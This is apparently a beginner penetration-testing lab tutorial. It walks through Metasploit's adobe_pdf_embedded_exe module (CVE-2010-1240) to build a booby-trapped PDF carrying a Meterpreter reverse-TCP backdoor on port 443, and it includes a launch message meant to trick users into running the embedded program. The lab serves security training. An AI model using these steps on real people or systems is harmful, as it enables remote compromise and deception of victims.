Creating PDF Files with Windows Backdoors

Beginner

Introduction

In this lab, we will explore how to leverage the embedded module vulnerability in Adobe PDF to inject a Windows backdoor. The lab process involves transmitting a PDF file containing a backdoor to a Windows host, which will infect the target Windows system when the owner opens the PDF file using Adobe Reader.

The lab environment provided by LabEx lacks a Windows virtual machine, so we cannot verify the effectiveness of the attack. The lab process will only demonstrate how to embed the backdoor program.

Furthermore, you do not need to start a target machine in this lab. You only need to start the Kali Linux environment, and the successfully created PDF file will be placed in the /root/ directory of the Kali host.

Start Metasploit Framework Console

Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2
  1. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  1. Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
  1. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

In the Kali Linux container, enter the following commands in the Kali Linux bash terminal:

service postgresql start
msfdb init
cd ~
msfconsole

This will start the PostgreSQL database service, initialize the database, and launch the Metasploit Framework Console (msfconsole) for further operations.

Use the Exploit Module

In the msfconsole, execute the following command to use the exploit module:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

This will load the adobe_pdf_embedded_exe exploit module, which allows us to embed an executable payload into a PDF file.

Use the show options command to view the configurable options for the exploit module:

show options

This will display the available options, such as:

  • EXENAME: The path to the executable file to be embedded in the PDF.
  • FILENAME: The name of the output PDF file (default: evil.pdf).
  • INFILENAME: The full path to the input PDF file (default: a built-in PDF file).
  • LAUNCH_MESSAGE: The message prompt to trick the user into executing the embedded executable.

You can leave most options at their default values, but you may want to set the INFILENAME option to specify the path to the input PDF file you want to infect.

After configuring the options, use the exploit command to execute the attack:

exploit

This will embed the payload into the specified input PDF file and generate a new PDF file with the embedded executable.

Press Ctrl+D to quit the Metasploit console then start the inspection

Examine the Output

After executing the exploit, the generated PDF file containing the malicious payload will be located at /root/.msf4/local/evil.pdf. You can exit the msfconsole and examine the file:

ls -l /root/.msf4/local/evil.pdf

You should observe an increase in the file size, indicating the presence of the embedded executable. When the PDF file is opened, it will display the configured launch message, prompting the user to click and execute the embedded program.

Set a Custom Payload

To make the infected PDF more valuable, we can set a custom payload for it.

Re-enter the msfconsole:

cd ~
msfconsole

In the msfconsole, follow the previous steps to select the attack module:

use exploit/windows/fileformat/adobe_pdf_embedded_exe

This time, we will use the windows/meterpreter/reverse_tcp payload, which is a Meterpreter backdoor that establishes a TCP connection from the compromised host back to the attacker's machine, allowing direct access to the compromised system. You can use the show payloads command to view and select other payloads if desired.

Set the windows/meterpreter/reverse_tcp payload:

set payload windows/meterpreter/reverse_tcp

Configure the payload by specifying the IP address and port of your Kali host to receive the incoming connection. Make sure the target host can connect to your Kali host:

set lhost 192.168.122.1

Using port 443 can help bypass some firewalls:

set lport 443

Then use the exploit command to generate the malicious PDF:

exploit

Press Ctrl+D to quit the Metasploit console then start the inspection

Examine the Output Again

Check the size of the generated PDF file:

ls -l /root/.msf4/local/evil.pdf

You should notice that the file size is smaller than the default payload, as the windows/meterpreter/reverse_tcp payload is more compact.

Summary

In this lab, we learned how to leverage the Adobe Reader vulnerability (CVE-2010-1240) that fails to validate embedded content in PDF files. By embedding a backdoor program into a PDF file and tricking the user into executing it, we can gain access to the target Windows host. The key points covered in this lab include:

  • Basic Linux commands
  • Metasploit Framework Console operations
  • Introduction to the Adobe PDF Embedded EXE Vulnerability (CVE-2010-1240)
  • How to exploit the vulnerability and embed a backdoor program

The lab provided hands-on experience in creating malicious PDF files with embedded payloads, configuring different options, and understanding the impact of different payloads on the file size. This knowledge can be useful for understanding and mitigating such attacks in real-world scenarios.

Other Tutorials you may like